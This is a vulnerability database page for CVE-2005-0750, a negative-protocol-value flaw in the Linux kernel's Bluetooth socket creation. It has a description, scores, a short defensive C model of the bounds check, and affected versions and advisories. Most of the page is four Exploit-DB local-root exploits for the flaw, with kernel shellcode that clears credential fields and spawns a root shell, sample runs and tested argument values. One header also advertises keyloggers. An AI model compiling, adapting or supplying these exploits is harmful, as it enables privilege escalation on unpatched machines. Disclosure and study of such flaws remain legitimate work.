CVE-2005-0750 : Detail

CVE-2005-0750

0.21%V4
Local
2005-04-03 03h00 +00:00
2017-10-09 22h57 +00:00

CVE Descriptions

The bluez_sock_create function in the Bluetooth stack for Linux kernel 2.4.6 through 2.4.30-rc1 and 2.6 through 2.6.11.5 allows local users to gain privileges via (1) socket or (2) socketpair call with a negative protocol value.
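The flaw described above is a signed index that is validated only against an upper bound. As an added illustration (a user-space model written for this page, not the kernel source; `MODEL_MAX_PROTO`, `model_table` and all function names are hypothetical), the following C compares that check with one that also rejects negative values:

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>

#define MODEL_MAX_PROTO 8   /* hypothetical table size for this model */

typedef int (*create_fn)(void);

static int create_ok(void) { return 0; }

/* Constructed handler table: slots 0 and 1 registered, the rest empty. */
static create_fn model_table[MODEL_MAX_PROTO] = { create_ok, create_ok };

/* Flawed validation: only the upper bound is tested. Because `proto`
 * is a signed int, every negative value passes this check. */
int flawed_check_accepts(int proto)
{
    return !(proto >= MODEL_MAX_PROTO);
}

/* Hardened validation: both bounds are tested before any lookup. */
int hardened_check_accepts(int proto)
{
    return proto >= 0 && proto < MODEL_MAX_PROTO;
}

/* Byte offset from the table base that an index would address.
 * Pure arithmetic, no memory is touched; a negative result means
 * the lookup would land below the start of the table. */
long long table_offset(int proto)
{
    return (long long)proto * (long long)sizeof(create_fn);
}

/* Lookup guarded by the hardened check. */
int model_sock_create(int proto)
{
    if (!hardened_check_accepts(proto))
        return -EINVAL;
    if (model_table[proto] == NULL)
        return -EPROTONOSUPPORT;
    return model_table[proto]();
}

int main(void)
{
    const int samples[] = { 0, 5, 8, -1, -1111 };  /* constructed inputs */

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int p = samples[i];
        printf("proto=%6d flawed_accepts=%d hardened_accepts=%d "
               "offset=%lld guarded_result=%d\n",
               p, flawed_check_accepts(p), hardened_check_accepts(p),
               table_offset(p), model_sock_create(p));
    }
    return 0;
}
```

Declaring the index as an unsigned type would close the same gap, since a negative argument then converts to a large value that fails the upper-bound test.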

CVE Information

Metrics

Metrics | Score | Severity | CVSS Vector | Source
V2 | 7.2 | | AV:L/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile is therefore used to compare the EPSS score of one CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 25287

Publication date : 2005-03-27 22h00 +00:00
Author : ilja van sprundel
EDB Verified : Yes

/*
EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/

source: https://www.securityfocus.com/bid/12911/info

A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes.

A local attacker may leverage this issue to gain escalated privileges on an affected computer.
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>

int main(void)
{
	int ctl;

	/* Open HCI socket, passing a negative protocol value */
	if ((ctl = socket(AF_BLUETOOTH, SOCK_RAW, -1111)) < 0) {
		perror("Can't open HCI socket.");
		exit(1);
	}
	return 0;
}

Exploit Database EDB-ID : 25289

Publication date : 2005-10-18 22h00 +00:00
Author : backdoored.net
EDB Verified : Yes

/* EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/25290/ source: https://www.securityfocus.com/bid/12911/info A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. A local attacker may leverage this issue to gain escalated privileges on an affected computer. */ /* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT * * 19 October 2005 http://backdoored.net Visit us for Undetected keyloggers and packers.Thanx h4x0r bluetooth $ id uid=1000(addicted) gid=100(users) groups=100(users) h4x0r bluetooth $ h4x0r bluetooth $ ./backdoored-bluetooth KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) Checking the Effective user id after overflow : UID = 0 h4x0r bluetooth # id uid=0(root) gid=0(root) groups=100(users) h4x0r bluetooth # h4x0r bluetooth # dmesg PREEMPT SMP Modules linked in: CPU: 0 EIP: 0060:[<c0405ead>] Not tainted VLI EFLAGS: 00010286 (2.6.9) EIP is at bt_sock_create+0x3d/0x130 eax: ffffffff ebx: ffebfe34 ecx: 00000000 edx: c051bea0 esi: ffffffa3 edi: ffffff9f ebp: 00000001 esp: c6729f1c ds: 007b es: 007b ss: 0068 Process backdoored-bluetooth (pid: 8809, threadinfo=c6729000 task=c6728a20) Stack: cef24e00 0000001f 0000001f c6581680 ffffff9f c039a3bb c6581680 ffebfe34 00000001 b8000c80 bffff944 c6729000 c039a58d 0000001f 00000003 ffebfe34 c6729f78 00000000 c039a60b 0000001f 00000003 ffebfe34 c6729f78 b8000c80 Call Trace: [<c039a3bb>] __sock_create+0xfb/0x2a0 [<c039a58d>] sock_create+0x2d/0x40 [<c039a60b>] sys_socket+0x2b/0x60 [<c039b4e8>] sys_socketcall+0x68/0x260 [<c0117a9c>] finish_task_switch+0x3c/0x90 [<c0117b07>] schedule_tail+0x17/0x50 [<c0115410>] do_page_fault+0x0/0x5e9 [<c01031af>] syscall_call+0x7/0xb Code: 24 0c 89 7c 24 10 83 fb 07 0f 
8f b1 00 00 00 8b 04 9d 60 a4 5d c0 85 c0 0f 84 d7 00 00 00 85 c0 be a3 ff ff ff 0f 84 93 00 00 00 <8b> 50 10 bf 01 00 00 00 85 d2 74 37 b8 00 f0 ff ff 21 e0 ff 40 */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <arpa/inet.h> #include <sys/types.h> #include <unistd.h> #include <limits.h> #include <signal.h> #include <sys/wait.h> #define KERNEL_SPACE_MEMORY_BRUTE_START 0xc0000000 #define KERNEL_SPACE_MEMORY_BRUTE_END 0xffffffff #define KERNEL_SPACE_BUFFER 0x100000 char asmcode[] = /*Global shellcode*/ "xb8x00xf0xffxffx31xc9x21xe0x8bx10x89x8a" "x80x01x00x00x31xc9x89x8ax7cx01x00x00x8b" "x00x31xc9x31xd2x89x88x90x01x00x00x89x90" "x8cx01x00x00xb8xffxffxffxffxc3"; struct net_proto_family { int family; int (*create) (int *sock, int protocol); short authentication; short encryption; short encrypt_net; int *owner; }; int check_zombie_child(int status,pid_t pid) { waitpid(pid,&status,0); if(WIFEXITED(status)) { if(WEXITSTATUS(status) != 0xFF) exit(-1); } else if (WIFSIGNALED(status)) { printf("KERNEL Oops. Exit Code = %d.(%s) ",WTERMSIG(status),strsignal(WTERMSIG(status))); return(WTERMSIG(status)); } } int brute_socket_create (int negative_proto_number) { socket(AF_BLUETOOTH,SOCK_RAW, negative_proto_number); /* overflowing proto number with negative 32bit value */ int i; i = geteuid(); printf("Checking the Effective user id after overflow : UID = %d ",i); if(i) exit(EXIT_FAILURE); printf("0wnage D0ne bro. 
"); execl("/bin/sh","sh",NULL); exit(EXIT_SUCCESS); } int main(void) { pid_t pid; int counter; int status; int *kernel_return; char kernel_buffer[KERNEL_SPACE_BUFFER]; unsigned int brute_start; unsigned int where_kernel; struct net_proto_family *bluetooth; bluetooth = (struct net_proto_family *) malloc(sizeof(struct net_proto_family)); bzero(bluetooth,sizeof(struct net_proto_family)); bluetooth->family = AF_BLUETOOTH; bluetooth->authentication = 0x0; /* No Authentication */ bluetooth->encryption = 0x0; /* No Encryption */ bluetooth->encrypt_net = 0x0; /* No Encrypt_net */ bluetooth->owner = 0x0; /* No fucking owner */ bluetooth->create = (int *) asmcode; kernel_return = (int *) kernel_buffer; for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4, kernel_return++) *kernel_return = (int)bluetooth; brute_start = KERNEL_SPACE_MEMORY_BRUTE_START; printf("Bluetooth stack local root exploit "); printf("http://backdoored/net"); while ( brute_start < KERNEL_SPACE_MEMORY_BRUTE_END ) { where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ; where_kernel = -where_kernel; pid = fork(); if(pid == 0 ) brute_socket_create(where_kernel); check_zombie_child(status,pid); brute_start += KERNEL_SPACE_BUFFER; fflush(stdout); } return 0; }
Exploit Database EDB-ID : 926

Publication date : 2005-10-25 22h00 +00:00
Author : qobaiashi
EDB Verified : Yes

/* Due to many responses i've improved the exploit to cover more systems! ONG_BAK v0.9 [october 24th 05] """""""""""""""""""""""""""""""""""" o universal "shellcode" added o try to use all possible memory regions o bugfixes qobaiashi@voyager:~/w00nf/kernelsploit> ./ong_bak -100222 -|-bluez local root exploit v.0.9 -by qobaiashi- | |- i've found kernel 2.6.11.4-20a-default |- trampoline is at 0x804869c |- trying... |- [ecx: bf8d0000 ] |- suitable value found!using 0xbf8d0000 |- the time has come to push the button... sh-3.00# exit ONG_BAK v0.3 [april 8th 05] """"""""""""""""""""""""""""""""" ong_bak now checks the value of ecx and launches the exploit in case a suitable value has been found! ONG_BAK v0.1 [april 4th 05] """"""""""""""""""""""""""""""""" local root exploit for the bluetooth bug usage: the bug is quite stable so you can't realy fuck things up if you stick to the following: play around with the negative argument until ecx points to our data segment: qobaiashi@voyager:~> ./ong_bak -1002341 -|-local bluez exploit v.0.3 -by qobaiashi- | |- i've found kernel 2.6.4-52-default |- trying... |- [ecx: 0b8f0f0f ] qobaiashi@voyager:~> ./ong_bak -10023411 -|-local bluez exploit v.0.3 -by qobaiashi- | |- i've found kernel 2.6.4-52-default |- trying... |- [ecx: 0809da40 ] |- suitable value found!using 0x0809da40 |- the time has come to push the button.. qobaiashi@voyager:~> id uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users) qobaiashi@voyager:~> that's it. unfortunately it's not yet very practicable.. 
qobaiashi@u-n-f.com */ #include <sys/klog.h> #include <sys/types.h> #include <unistd.h> #include <stdlib.h> #include <sys/socket.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/hci_lib.h> #include <sys/utsname.h> #include <sys/mman.h> void usage(char *path); //===================[ kernel 2.6* privilege elevator ]=============================== //===================[ qobaiashi@u-n-f.com ]=============================== //globals int uid, gid; extern load_highlevel; __asm__ ( "load_highlevel: \n" "xor %eax, %eax \n" "mov $0xffffe000, %eax\n" "and %esp,%eax \n" "pushl %eax \n" "call set_root \n" "pop %eax \n" //ret to userspace-2.6.* version " cli \n" " pushl $0x7b \n" //DS user selector " pop %ds \n" " pushl %ds \n" //SS " pushl $0xc0000000 \n" //ESP " pushl $0x246 \n" //EFLAGS " pushl $0x73 \n" //CS user selector " pushl $shellcode \n" //EIP must not be a push /bin/sh shellcode!! "iret \n" ); void set_root(unsigned int *ts) { ts = (int*)*ts; int cntr; //hope you guys are int aligned for(cntr = 0; cntr <= 512; cntr++, ts++) if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid) ts[0] = ts[1] = ts[4] = ts[5] = 0; } void shellcode() { system("/bin/sh"); exit(0); } //==================================================================================== //==================================================================================== main(int argc, char *argv[]) { char buf[2048]; int sock, *mod = (int*)buf; int *linker = 0; unsigned int arg; int tmp; char *check; struct utsname vers; gid = getgid(); uid = getuid(); printf("-|-bluez local root exploit v.0.9 -by qobaiashi-\n |\n"); if (uname(&vers) < 0) printf(" |- couldn't determine kernel version\n"); else printf(" |- i've found kernel %s\n", vers.release); printf(" |- trampoline is at %p\n", &load_highlevel); if (argc < 2) { usage(argv[0]); exit(1); } if (argc == 2) arg = strtoul(argv[1], 0, 0); if (fork() != 0)//parent watch the Oops { //previous Oops printing 
usleep(1000); if ((tmp = klogctl(0x3, buf, 1700)) > -1) { check = strstr(buf, "ecx: "); printf(" |- [%0.14s]\n", check); check+=5; *(check+9) = 0x00;*(--check) = 'x';*(--check) = '0'; mod = (unsigned int*)strtoul(check, 0, 0); //page align FIXME: might be booggy int *ecx = mod; mod = (int)mod &~ 0x00000fff; linker = mmap((void*)mod,0x2000,PROT_WRITE|PROT_READ,MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED,0,0); if(linker == mod)//we could mmap the area { printf(" |- suitable value found!using %p\n", mod); printf(" |- the time has come to push the button... \n"); for (sock = 0;sock <= 1;sock++) //use ecx *(ecx++) = (int)&load_highlevel; //link to shellcode } else { printf(" |- could not mmap %p\n", mod); if( brk((void*)mod+0x200 ) == -1) { printf(" |- could not brk to %p\n", mod); printf(" `-------------------------------\n"); exit(-1); } //here we did it printf(" |- suitable value found!using %p\n", mod); printf(" |- the time has come to push the button... \n"); for (sock = 0;sock <= 1;sock++) //use ecx *(ecx++) = (int)&load_highlevel; //link to shellcode } if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) exit(1); } return 0; } if (fork() == 0)//child does the pre-exploit { printf(" |- trying...\n"); if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) { printf(" |- something went w0rng (invalid value)\n"); exit(1); } } exit(0); } /*****************\ |** usage **| \*****************/ void usage(char *path) { printf(" |----------------------------\n"); printf(" | usage: %s <negative value> \n", path); printf(" | tested:\n"); printf(" | SuSE 9.1: -10023411 \n"); printf(" | -41122122 \n"); printf(" | Kernel 2.6.11: -10023 \n"); printf(" | SuSE 9.3: -100222\n"); printf(" | -102901\n"); printf(" `-----------------------\n"); exit(0); } // 1st post: milw0rm.com [2005-04-09] // milw0rm.com [2005-10-26]
Exploit Database EDB-ID : 25288

Publication date : 2005-04-07 22h00 +00:00
Author : qobaiashi
EDB Verified : Yes

/* EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/ source: https://www.securityfocus.com/bid/12911/info A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. A local attacker may leverage this issue to gain escalated privileges on an affected computer. */ /* ONG_BAK v0.3 [april 8th 05] """"""""""""""""""""""""""""""""" ong_bak now checks the value of ecx and launches the exploit in case a suitable value has been found! ONG_BAK v0.1 [april 4th 05] """"""""""""""""""""""""""""""""" local root exploit for the bluetooth bug usage: the bug is quite stable so you can't realy fuck things up if you stick to the following: play around with the negative argument until ecx points to our data segment: qobaiashi@voyager:~> id uid=1000(qobaiashi) gid=100(users) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users) qobaiashi@voyager:~> ./ong_bak -1002341 -|-local bluez exploit v.0.3 -by qobaiashi- | |- i've found kernel 2.6.4-52-default |- trying... |- [ecx: 0b8f0f0f ] qobaiashi@voyager:~> ./ong_bak -10023411 -|-local bluez exploit v.0.3 -by qobaiashi- | |- i've found kernel 2.6.4-52-default |- trying... |- [ecx: 0809da40 ] |- suitable value found!using 0x0809da40 |- the time has come to push the button.. qobaiashi@voyager:~> id uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users) qobaiashi@voyager:~> the parent process becomes root. that's it. unfortunately it's not yet very practicable.. 
qobaiashi@u-n-f.com */ #include <sys/klog.h> #include <sys/types.h> #include <unistd.h> #include <stdlib.h> #include <sys/socket.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/hci_lib.h> #include <sys/utsname.h> #define BRKVAL 0x0cec9000 //should be enough but fix it if you get an error void usage(char *path); //due to changing task_structs we need different offsets char k_give_root[] = //----[ give root in ring0/tested on linux2.6.5/x86/ by -q ]-----\\ "\x90\x90\x90\x90" "\x90\x90\x90\x90" "\x31\xc0" // xor %eax,%eax "\xb8\x00\xe0\xff\xff" // mov $0xffffe000,%eax "\x21\xe0" // and %esp,%eax "\x8b\x00" // mov (%eax),%eax "\x8b\x80\xa4\x00\x00\x00" // mov 0xa4(%eax),%eax "\xc7\x80\xf0\x01\x00\x00\x00" // movl $0x0,0x1f0(%eax) "\x00\x00\x00" "\xc7\x80\xf4\x01\x00\x00\x00" // movl $0x0,0x1f4(%eax) "\x00\x00\x00" "\xc7\x80\x00\x02\x00\x00\x00" // movl $0x0,0x200(%eax) "\x00\x00\x00" "\xc7\x80\x04\x02\x00\x00\x00" // movl $0x0,0x204(%eax) "\x00\x00\x00" "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80" // int $0x80 ; char k_give_root2[] = //----[ give root in ring0/tested linux2.6.11/x86/ by -q ]-----\\ "\x90\x90\x90\x90" "\x90\x90\x90\x90" "\x31\xc0" // xor %eax,%eax "\xb8\x00\xe0\xff\xff" // mov $0xffffe000,%eax "\x21\xe0" // and %esp,%eax "\x8b\x00" // mov (%eax),%eax "\x8b\x80\x9c\x00\x00\x00" // mov 0x9c(%eax),%eax "\xc7\x80\x68\x01\x00\x00\x00" // movl $0x0,0x168(%eax) "\x00\x00\x00" "\xc7\x80\x78\x01\x00\x00\x00" // movl $0x0,0x178(%eax) "\x00\x00\x00" "\xc7\x80\x6c\x01\x00\x00\x00" // movl $0x0,0x16c(%eax) "\x00\x00\x00" "\xc7\x80\x7c\x01\x00\x00\x00" // movl $0x0,0x17c(%eax) "\x00\x00\x00" "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80" // int $0x80 ; main(int argc, char *argv[]) { char buf[2048]; int sock, *mod = (int*)buf; unsigned int arg; int tmp; char *check, *ong_code = 0; struct utsname vers; printf("-|-local bluez exploit v.0.3 -by qobaiashi-\n |\n"); if (uname(&vers) < 0) printf(" |- couldn't 
determine kernel version\n"); else { printf(" |- i've found kernel %s\n", vers.release); if(strstr(vers.release, "2.6.11") > 0) ong_code = k_give_root2; if(strstr(vers.release, "2.6.4") > 0) ong_code = k_give_root; } if (ong_code == 0) { printf(" |- no supported version found..trying 2.6.4 code\n"); ong_code = k_give_root; } if( brk((void*)BRKVAL) == -1 ) { printf(" |- brk failed..exiting\n"); exit(1); } if (argc < 2) { usage(argv[0]); exit(1); } if (argc == 2) arg = strtoul(argv[1], 0, 0); if (argc == 3) { arg = strtoul(argv[1], 0, 0); mod = (unsigned int*)strtoul(argv[2], 0, 0); } if (fork() != 0)//parent watch the Oops { //previous Oops printing usleep(100); if ((tmp = klogctl(0x3, buf, 1700)) > -1) { check = strstr(buf, "ecx: "); printf(" |- [%0.14s]\n", check); if (*(check+5) == 0x30 && *(check+6) == 0x38) { check+=5; printf(" |- suitable value found!using 0x%0.9s\n", check); printf(" |- the time has come to push the button... check your id!\n"); *(check+9) = 0x00;*(--check) = 'x';*(--check) = '0'; mod = (unsigned int*)strtoul(check, 0, 0); for (sock = 0;sock <= 200;sock++) *(mod++) = (int)ong_code;//link to shellcode if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) { printf(" |- something went w0rng (invalid value)\n"); exit(1); } } } return 0; } if (fork() == 0)//child does the exploit { for (sock = 0;sock <= 200;sock++) *(mod++) = (int)ong_code;//link to shellcode printf(" |- trying...\n"); if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) { printf(" |- something went w0rng (invalid value)\n"); exit(1); } } exit(0); } /*****************\ |** usage **| \*****************/ void usage(char *path) { printf(" |----------------------------\n"); printf(" | usage: %s <negative value> \n", path); printf(" | tested:\n"); printf(" | SuSE 9.1: -10023411 \n"); printf(" | -10029 \n"); printf(" | Kernel 2.6.11: -10023 \n"); exit(0); }

Products Mentioned

Configuration 0

Conectiva>>Linux >> Version 10.0

Configuration 0

Linux>>Linux_kernel >> Version 2.4.6

Linux>>Linux_kernel >> Version 2.4.7

Linux>>Linux_kernel >> Version 2.4.8

Linux>>Linux_kernel >> Version 2.4.9

Linux>>Linux_kernel >> Version 2.4.10

Linux>>Linux_kernel >> Version 2.4.11

Linux>>Linux_kernel >> Version 2.4.12

Linux>>Linux_kernel >> Version 2.4.13

Linux>>Linux_kernel >> Version 2.4.14

Linux>>Linux_kernel >> Version 2.4.15

Linux>>Linux_kernel >> Version 2.4.16

Linux>>Linux_kernel >> Version 2.4.17

Linux>>Linux_kernel >> Version 2.4.18

Linux>>Linux_kernel >> Version 2.4.19

Linux>>Linux_kernel >> Version 2.4.20

Linux>>Linux_kernel >> Version 2.4.21

Linux>>Linux_kernel >> Version 2.4.22

Linux>>Linux_kernel >> Version 2.4.23

Linux>>Linux_kernel >> Version 2.4.24

Linux>>Linux_kernel >> Version 2.4.25

Linux>>Linux_kernel >> Version 2.4.26

Linux>>Linux_kernel >> Version 2.4.27

Linux>>Linux_kernel >> Version 2.4.28

Linux>>Linux_kernel >> Version 2.4.29

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.1

Linux>>Linux_kernel >> Version 2.6.2

Linux>>Linux_kernel >> Version 2.6.3

Linux>>Linux_kernel >> Version 2.6.4

Linux>>Linux_kernel >> Version 2.6.5

Linux>>Linux_kernel >> Version 2.6.6

Linux>>Linux_kernel >> Version 2.6.7

Linux>>Linux_kernel >> Version 2.6.8

Linux>>Linux_kernel >> Version 2.6.9

Linux>>Linux_kernel >> Version 2.6.10

Linux>>Linux_kernel >> Version 2.6.11

Redhat>>Enterprise_linux >> Version 4.0

Redhat>>Enterprise_linux >> Version 4.0

Redhat>>Enterprise_linux >> Version 4.0

Redhat>>Enterprise_linux_desktop >> Version 4.0

Redhat>>Fedora_core >> Version core_1.0

Redhat>>Fedora_core >> Version core_2.0

Redhat>>Fedora_core >> Version core_3.0

Redhat>>Linux >> Version 7.3

Redhat>>Linux >> Version 7.3

Redhat>>Linux >> Version 7.3

Redhat>>Linux >> Version 9.0

Suse>>Suse_linux >> Version 1.0

Suse>>Suse_linux >> Version 9.3

Ubuntu>>Ubuntu_linux >> Version 4.1

Ubuntu>>Ubuntu_linux >> Version 4.1

References

http://www.redhat.com/support/errata/RHSA-2005-366.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2005-283.html
Tags : vendor-advisory, x_refsource_REDHAT
http://marc.info/?l=bugtraq&m=111204562102633&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/12911
Tags : vdb-entry, x_refsource_BID
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=152532
Tags : vendor-advisory, x_refsource_FEDORA
http://www.redhat.com/support/errata/RHSA-2005-293.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2005-284.html
Tags : vendor-advisory, x_refsource_REDHAT